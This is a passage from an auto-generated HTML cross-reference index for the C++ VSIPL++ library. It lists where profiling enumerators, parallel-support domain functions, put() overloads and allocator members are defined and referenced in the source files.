href="../Source/vsip/core/aligned_allocator.hpp.html#91">vsip/core/aligned_allocator.hpp:91</a>: in member function <a href="../Scopes/vsip/impl/Aligned_allocator.html#allocate_lsize_type_cconst.void_S_r">vsip::impl::Aligned_allocator::allocate&#40;size_type&#44;const void*&#41;</a></li> <li><a href="../Source/vsip/core/aligned_allocator.hpp.html#125">vsip/core/aligned_allocator.hpp:125</a>: in member function <a href="../Scopes/vsip/impl/Aligned_allocator.html#deallocate_lpointer_csize_type_r">vsip::impl::Aligned_allocator::deallocate&#40;pointer&#44;size_type&#41;</a></li> <li><a href="../Source/vsip/core/allocation.hpp.html#130">vsip/core/allocation.hpp:130</a>: in member function <a href="../Scopes/vsip/impl/aligned_array.html#aligned_array_lsize_t_r">vsip::impl::aligned_array::aligned_array&#40;size_t&#41;</a></li> <li><a href="../Source/vsip/core/allocation.hpp.html#137">vsip/core/allocation.hpp:137</a>: in member function <a href="../Scopes/vsip/impl/aligned_array.html#aligned_array_lsize_t_csize_t_cT_S_r">vsip::impl::aligned_array::aligned_array&#40;size_t&#44;size_t&#44;T*&#41;</a></li> <li><a href="../Source/vsip/core/allocation.hpp.html#145">vsip/core/allocation.hpp:145</a>: in member function <a href="../Scopes/vsip/impl/aligned_array.html#_taligned_array_l_r">vsip::impl::aligned_array::~aligned_array&#40;&#41;</a></li> <li><a href="../Source/vsip/core/allocation.hpp.html#185">vsip/core/allocation.hpp:185</a>: in member function <a href="../Scopes/vsip/impl/aligned_array.html#reset_lvalue_type_S_csize_t_r">vsip::impl::aligned_array::reset&#40;value_type*&#44;size_t&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#55">vsip/core/block_copy.hpp:55</a>: in member function <a href="../Scopes/vsip/impl/Block_copy_to_ptr.html#copy_lBlock_S_cLP_A_cptr_type_r">vsip::impl::Block_copy_to_ptr::copy&#40;Block*&#44;LP&amp;&#44;ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#81">vsip/core/block_copy.hpp:81</a>: in member function <a href="../Scopes/vsip/impl/Block_copy_from_ptr.html#copy_lBlock_S_cLP_A_cptr_type_r">vsip::impl::Block_copy_from_ptr::copy&#40;Block*&#44;LP&amp;&#44;ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/memory_pool.hpp.html#51">vsip/core/memory_pool.hpp:51</a>: in member function template <a href="../Scopes/vsip/impl/Memory_pool.html#allocate_llength_type_r">vsip::impl::Memory_pool::allocate&#40;length_type&#41;</a></li> <li><a href="../Source/vsip/core/memory_pool.hpp.html#59">vsip/core/memory_pool.hpp:59</a>: in member function template <a href="../Scopes/vsip/impl/Memory_pool.html#deallocate_lT_S_clength_type_r">vsip::impl::Memory_pool::deallocate&#40;T*&#44;length_type&#41;</a></li> <li><a href="../Source/vsip/core/stored_block.hpp.html#342">vsip/core/stored_block.hpp:342</a>: in member function <a href="../Scopes/vsip/impl/Stored_block.LT.cLayout.LD.cO.cStride_unit_dense.cF.R.R.html#admit_lbool_r">vsip::impl::Stored_block&lt;T&#44;Layout&lt;D&#44;O&#44;Stride_unit_dense&#44;F&gt;&gt;::admit&#40;bool&#41;</a></li> <li><a href="../Source/vsip/core/stored_block.hpp.html#360">vsip/core/stored_block.hpp:360</a>: in member function <a href="../Scopes/vsip/impl/Stored_block.LT.cLayout.LD.cO.cStride_unit_dense.cF.R.R.html#release_lbool_r">vsip::impl::Stored_block&lt;T&#44;Layout&lt;D&#44;O&#44;Stride_unit_dense&#44;F&gt;&gt;::release&#40;bool&#41;</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mfunc"></a><h2>Enumerator vsip::impl::profile::func</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#func">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#100">vsip/core/profile.hpp:100</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mmask"></a><h2>Namespace constant vsip::impl::profile::mask</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#mask">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#85">vsip/core/profile.hpp:85</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mmatvec"></a><h2>Enumerator vsip::impl::profile::matvec</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#matvec">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#102">vsip/core/profile.hpp:102</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mmemory"></a><h2>Enumerator vsip::impl::profile::memory</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#memory">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#96">vsip/core/profile.hpp:96</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mnone"></a><h2>Enumerator vsip::impl::profile::none</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#none">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#95">vsip/core/profile.hpp:95</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/opt/dispatch_profile.hpp.html#40">vsip/opt/dispatch_profile.hpp:40</a>: in struct <a href="../Scopes/vsip_csl/dispatcher/Profile_feature.html">vsip_csl::dispatcher::Profile_feature</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mpar"></a><h2>Enumerator vsip::impl::profile::par</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#par">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#98">vsip/core/profile.hpp:98</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/core/parallel/assign_block_vector.hpp.html#179">vsip/core/parallel/assign_block_vector.hpp:179</a>: in vsip::impl::Par_assign&lt;Dim&#44;T1&#44;T2&#44;Block1&#44;Block2&#44;Blkvec_assign&gt;::Par_assign&#40;View_of_dim</li> <li><a href="../Source/vsip/core/parallel/assign_chain.hpp.html#273">vsip/core/parallel/assign_chain.hpp:273</a>: in vsip::impl::Par_assign&lt;Dim&#44;T1&#44;T2&#44;Block1&#44;Block2&#44;Chained_assign&gt;::Par_assign&#40;View_of_dim</li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mpm_accum"></a><h2>Enumerator vsip::impl::profile::pm_accum</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#pm_accum">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#465">vsip/opt/profile.hpp:465</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mpm_none"></a><h2>Enumerator vsip::impl::profile::pm_none</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#pm_none">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#466">vsip/opt/profile.hpp:466</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mpm_trace"></a><h2>Enumerator vsip::impl::profile::pm_trace</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#pm_trace">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#464">vsip/opt/profile.hpp:464</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mprof"></a><h2>Namespace variable vsip::impl::profile::prof</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#prof">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#535">vsip/opt/profile.hpp:535</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#542">vsip/opt/profile.hpp:542</a>: in vsip::impl::profile::Profile::Profile&#40;const std</li> <li><a href="../Source/vsip/opt/profile.hpp.html#543">vsip/opt/profile.hpp:543</a>: in member function <a href="../Scopes/vsip/impl/profile/Profile.html#_tProfile_l_r">vsip::impl::profile::Profile::~Profile&#40;&#41;</a></li> <li><a href="../Source/vsip/opt/profile.hpp.html#644">vsip/opt/profile.hpp:644</a>: in member function <a href="../Scopes/vsip/impl/profile/Scope_base.Ltrue.R.html#_tScope_base_l_r">vsip::impl::profile::Scope_base&lt;true&gt;::~Scope_base&#40;&#41;</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_mprofiler_mode"></a><h2>Enum vsip::impl::profile::profiler_mode</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#profiler_mode">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#462">vsip/opt/profile.hpp:462</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/opt/profile.hpp.html#513">vsip/opt/profile.hpp:513</a>: in class <a href="../Scopes/vsip/impl/profile/Profiler.html">vsip::impl::profile::Profiler</a></li> <li><a href="../Source/vsip/opt/profile.hpp.html#523">vsip/opt/profile.hpp:523</a>: in class <a href="../Scopes/vsip/impl/profile/Profiler.html">vsip::impl::profile::Profiler</a></li> <li><a href="../Source/vsip/opt/profile.hpp.html#540">vsip/opt/profile.hpp:540</a>: in class <a href="../Scopes/vsip/impl/profile/Profile.html">vsip::impl::profile::Profile</a></li> <li><a href="../Source/vsip/opt/profile.hpp.html#547">vsip/opt/profile.hpp:547</a>: in class <a href="../Scopes/vsip/impl/profile/Profile.html">vsip::impl::profile::Profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_msignal"></a><h2>Enumerator vsip::impl::profile::signal</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#signal">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#101">vsip/core/profile.hpp:101</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/core/fft.hpp.html#130">vsip/core/fft.hpp:130</a>: in class <a href="../Scopes/vsip/impl/fft/Interface.html">vsip::impl::fft::Interface</a></li> <li><a href="../Source/vsip/core/fft.hpp.html#132">vsip/core/fft.hpp:132</a>: in class <a href="../Scopes/vsip/impl/fft/Interface.html">vsip::impl::fft::Interface</a></li> <li><a href="../Source/vsip/core/signal/conv.hpp.html#81">vsip/core/signal/conv.hpp:81</a>: in class <a href="../Scopes/vsip/Convolution.html">vsip::Convolution</a></li> <li><a href="../Source/vsip/core/signal/conv.hpp.html#100">vsip/core/signal/conv.hpp:100</a>: in class <a href="../Scopes/vsip/Convolution.html">vsip::Convolution</a></li> <li><a href="../Source/vsip/core/signal/corr.hpp.html#72">vsip/core/signal/corr.hpp:72</a>: in class <a href="../Scopes/vsip/Correlation.html">vsip::Correlation</a></li> <li><a href="../Source/vsip/core/signal/corr.hpp.html#89">vsip/core/signal/corr.hpp:89</a>: in class <a href="../Scopes/vsip/Correlation.html">vsip::Correlation</a></li> <li><a href="../Source/vsip/core/signal/fir.hpp.html#121">vsip/core/signal/fir.hpp:121</a>: in class <a href="../Scopes/vsip/Fir.html">vsip::Fir</a></li> <li><a href="../Source/vsip/core/signal/fir.hpp.html#123">vsip/core/signal/fir.hpp:123</a>: in class <a href="../Scopes/vsip/Fir.html">vsip::Fir</a></li> <li><a href="../Source/vsip/core/signal/iir.hpp.html#31">vsip/core/signal/iir.hpp:31</a>: in class <a href="../Scopes/vsip/Iir.html">vsip::Iir</a></li> <li><a href="../Source/vsip/core/signal/iir.hpp.html#33">vsip/core/signal/iir.hpp:33</a>: in class <a href="../Scopes/vsip/Iir.html">vsip::Iir</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_msolver"></a><h2>Enumerator vsip::impl::profile::solver</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#solver">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#103">vsip/core/profile.hpp:103</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mprofile_muser"></a><h2>Enumerator vsip::impl::profile::user</h2><ul> <li><a href="../Scopes/vsip/impl/profile.html#user">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/profile.hpp.html#105">vsip/core/profile.hpp:105</a>: in using namespace <a href="../Scopes/vsip/impl/profile.html">vsip::impl::profile</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mproject_lconst.Domain_LOrigDim_R_A_r"></a><h2>Function template vsip::impl::project&#40;const Domain&lt;OrigDim&gt;&amp;&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#project_lconst.Domain_LOrigDim_R_A_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/domain_utils.hpp.html#91">vsip/core/domain_utils.hpp:91</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> <li>Called from: <ul> <li><a href="../Source/vsip/core/domain_utils.hpp.html#93">vsip/core/domain_utils.hpp:93</a>: in function template <a href="../Scopes/vsip/impl.html#project_lconst.Domain_LOrigDim_R_A_r">vsip::impl::project&#40;const Domain&lt;OrigDim&gt;&amp;&#41;</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail"></a><h2>Namespace vsip::impl::psf_detail</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support_block.hpp.html#33">vsip/core/parallel/support_block.hpp:33</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> <li><a href="../Source/vsip/core/parallel/support.hpp.html#36">vsip/core/parallel/support.hpp:36</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mblock_subblock_domain_lconst.BlockT_A_cconst.Local_map_A_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::block_subblock_domain&#40;const BlockT&amp;&#44;const Local_map&amp;&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#block_subblock_domain_lconst.BlockT_A_cconst.Local_map_A_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support_block.hpp.html#46">vsip/core/parallel/support_block.hpp:46</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mblock_subblock_domain_lconst.BlockT_A_cconst.MapT_A_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::block_subblock_domain&#40;const BlockT&amp;&#44;const MapT&amp;&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#block_subblock_domain_lconst.BlockT_A_cconst.MapT_A_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support_block.hpp.html#60">vsip/core/parallel/support_block.hpp:60</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mglobal_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::global_domain&#40;const ViewT&amp;&#44;const Local_map&amp;&#44;index_type&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#global_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#99">vsip/core/parallel/support.hpp:99</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mglobal_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::global_domain&#40;const ViewT&amp;&#44;const MapT&amp;&#44;index_type&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#global_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#113">vsip/core/parallel/support.hpp:113</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mlocal_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::local_domain&#40;const ViewT&amp;&#44;const Local_map&amp;&#44;index_type&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#local_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#70">vsip/core/parallel/support.hpp:70</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_mlocal_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::local_domain&#40;const ViewT&amp;&#44;const MapT&amp;&#44;index_type&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#local_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#84">vsip/core/parallel/support.hpp:84</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_msubblock_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::subblock_domain&#40;const ViewT&amp;&#44;const Local_map&amp;&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#subblock_domain_lconst.ViewT_A_cconst.Local_map_A_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#43">vsip/core/parallel/support.hpp:43</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mpsf_detail_msubblock_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_r"></a><h2>Function template vsip::impl::psf_detail::subblock_domain&#40;const ViewT&amp;&#44;const MapT&amp;&#44;index_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/psf_detail.html#subblock_domain_lconst.ViewT_A_cconst.MapT_A_cindex_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/support.hpp.html#56">vsip/core/parallel/support.hpp:56</a>: in namespace <a href="../Scopes/vsip/impl/psf_detail.html">vsip::impl::psf_detail</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mput_lBlock_A_cconst.Index_L_S_R_A_cconst.Block_mvalue_type_A_r"></a><h2>vsip::impl::put&#40;Block&amp;&#44;const Index&lt;*&gt;&amp;&#44;const Block::value_type&amp;&#41;</h2><ul> <li>Defined at: <ul> <li><a href="../Source/vsip/core/domain_utils.hpp.html#501">vsip/core/domain_utils.hpp:501</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> <li><a href="../Source/vsip/core/domain_utils.hpp.html#508">vsip/core/domain_utils.hpp:508</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> <li><a href="../Source/vsip/core/domain_utils.hpp.html#514">vsip/core/domain_utils.hpp:514</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> <li>Called from: <ul> <li><a href="../Source/vsip/core/block_copy.hpp.html#60">vsip/core/block_copy.hpp:60</a>: in member function <a href="../Scopes/vsip/impl/Block_copy_to_ptr.html#copy_lBlock_S_cLP_A_cptr_type_r">vsip::impl::Block_copy_to_ptr::copy&#40;Block*&#44;LP&amp;&#44;ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#87">vsip/core/block_copy.hpp:87</a>: in member function <a href="../Scopes/vsip/impl/Block_copy_from_ptr.html#copy_lBlock_S_cLP_A_cptr_type_r">vsip::impl::Block_copy_from_ptr::copy&#40;Block*&#44;LP&amp;&#44;ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#150">vsip/core/block_copy.hpp:150</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_to_ptr_impl.LDim.cBlock.ctrue.R.html#copy_lBlock_S_cconst.LP_A_cinter_ptr_type_r">vsip::impl::Rt_block_copy_to_ptr_impl&lt;Dim&#44;Block&#44;true&gt;::copy&#40;Block*&#44;const LP&amp;&#44;inter_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#158">vsip/core/block_copy.hpp:158</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_to_ptr_impl.LDim.cBlock.ctrue.R.html#copy_lBlock_S_cconst.LP_A_csplit_ptr_type_r">vsip::impl::Rt_block_copy_to_ptr_impl&lt;Dim&#44;Block&#44;true&gt;::copy&#40;Block*&#44;const LP&amp;&#44;split_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#189">vsip/core/block_copy.hpp:189</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_to_ptr_impl.LDim.cBlock.cfalse.R.html#copy_lBlock_S_cconst.LP_A_cinter_ptr_type_r">vsip::impl::Rt_block_copy_to_ptr_impl&lt;Dim&#44;Block&#44;false&gt;::copy&#40;Block*&#44;const LP&amp;&#44;inter_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#246">vsip/core/block_copy.hpp:246</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_from_ptr_impl.LDim.cBlock.ctrue.ctrue.R.html#copy_lBlock_S_cconst.LP_A_cinter_ptr_type_r">vsip::impl::Rt_block_copy_from_ptr_impl&lt;Dim&#44;Block&#44;true&#44;true&gt;::copy&#40;Block*&#44;const LP&amp;&#44;inter_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#254">vsip/core/block_copy.hpp:254</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_from_ptr_impl.LDim.cBlock.ctrue.ctrue.R.html#copy_lBlock_S_cconst.LP_A_csplit_ptr_type_r">vsip::impl::Rt_block_copy_from_ptr_impl&lt;Dim&#44;Block&#44;true&#44;true&gt;::copy&#40;Block*&#44;const LP&amp;&#44;split_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/block_copy.hpp.html#305">vsip/core/block_copy.hpp:305</a>: in member function <a href="../Scopes/vsip/impl/Rt_block_copy_from_ptr_impl.LDim.cBlock.cfalse.ctrue.R.html#copy_lBlock_S_cconst.LP_A_cinter_ptr_type_r">vsip::impl::Rt_block_copy_from_ptr_impl&lt;Dim&#44;Block&#44;false&#44;true&gt;::copy&#40;Block*&#44;const LP&amp;&#44;inter_ptr_type&#41;</a></li> <li><a href="../Source/vsip/core/lvalue_proxy.hpp.html#144">vsip/core/lvalue_proxy.hpp:144</a>: in member function <a href="../Scopes/vsip/impl/Lvalue_proxy.html#operator_e_lvalue_type_r">vsip::impl::Lvalue_proxy::operator=&#40;value_type&#41;</a></li> <li><a href="../Source/vsip/core/lvalue_proxy.hpp.html#186">vsip/core/lvalue_proxy.hpp:186</a>: in vsip::impl::Lvalue_proxy&lt;std::complex&lt;T&gt;&#44;Block&#44;Dim&gt;::operator=&#40;const value_type&amp;&#41;</li> <li><a href="../Source/vsip/core/parallel/util.hpp.html#120">vsip/core/parallel/util.hpp:120</a>: in function template <a href="../Scopes/vsip/impl.html#foreach_point_lViewT_cFuncT_r">vsip::impl::foreach_point&#40;ViewT&#44;FuncT&#41;</a></li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#413">vsip/core/signal/conv_common.hpp:413</a>: in vsip::impl::conv_full&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#448">vsip/core/signal/conv_common.hpp:448</a>: in vsip::impl::conv_same&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#485">vsip/core/signal/conv_common.hpp:485</a>: in vsip::impl::conv_min&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#811">vsip/core/signal/conv_common.hpp:811</a>: in vsip::impl::conv_full&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#869">vsip/core/signal/conv_common.hpp:869</a>: in vsip::impl::conv_same&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#926">vsip/core/signal/conv_common.hpp:926</a>: in vsip::impl::conv_min&#40;std</li> <li><a href="../Source/vsip/core/signal/conv_common.hpp.html#1015">vsip/core/signal/conv_common.hpp:1015</a>: in vsip::impl::conv_same_edge&#40;std</li> <li><a href="../Source/vsip/core/signal/corr_common.hpp.html#299">vsip/core/signal/corr_common.hpp:299</a>: in vsip::impl::corr_full&#40;bias_type&#44;std</li> <li><a href="../Source/vsip/core/signal/corr_common.hpp.html#354">vsip/core/signal/corr_common.hpp:354</a>: in vsip::impl::corr_same&#40;bias_type&#44;std</li> <li><a href="../Source/vsip/core/signal/corr_common.hpp.html#393">vsip/core/signal/corr_common.hpp:393</a>: in vsip::impl::corr_min&#40;bias_type&#44;std</li> <li><a href="../Source/vsip/core/signal/corr_common.hpp.html#664">vsip/core/signal/corr_common.hpp:664</a>: in vsip::impl::corr_base&#40;bias_type&#44;std</li> <li><a href="../Source/vsip/core/storage.hpp.html#415">vsip/core/storage.hpp:415</a>: in member function <a href="../Scopes/vsip/impl/Rt_allocated_storage.html#Rt_allocated_storage_llength_type_crt_complex_type_cT_ctype_r">vsip::impl::Rt_allocated_storage::Rt_allocated_storage&#40;length_type&#44;rt_complex_type&#44;T&#44;type&#41;</a></li> <li><a href="../Source/vsip/core/storage.hpp.html#421">vsip/core/storage.hpp:421</a>: in member function <a href="../Scopes/vsip/impl/Rt_allocated_storage.html#Rt_allocated_storage_llength_type_crt_complex_type_cT_ctype_r">vsip::impl::Rt_allocated_storage::Rt_allocated_storage&#40;length_type&#44;rt_complex_type&#44;T&#44;type&#41;</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mput_lMatrix_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r"></a><h2>Function template vsip::impl::put&#40;Matrix&lt;T&#44;Block&gt;&#44;const Index&lt;*&gt;&amp;&#44;T&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#put_lMatrix_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/matrix.hpp.html#457">vsip/matrix.hpp:457</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mput_lTensor_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r"></a><h2>Function template vsip::impl::put&#40;Tensor&lt;T&#44;Block&gt;&#44;const Index&lt;*&gt;&amp;&#44;T&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#put_lTensor_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/tensor.hpp.html#656">vsip/tensor.hpp:656</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mput_lVector_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r"></a><h2>Function template vsip::impl::put&#40;Vector&lt;T&#44;Block&gt;&#44;const Index&lt;*&gt;&amp;&#44;T&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#put_lVector_LT_cBlock_R_cconst.Index_L_S_R_A_cT_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/vector.hpp.html#375">vsip/core/vector.hpp:375</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrealtocomplex_functor"></a><h2>Struct vsip::impl::realtocomplex_functor</h2><ul> <li><a 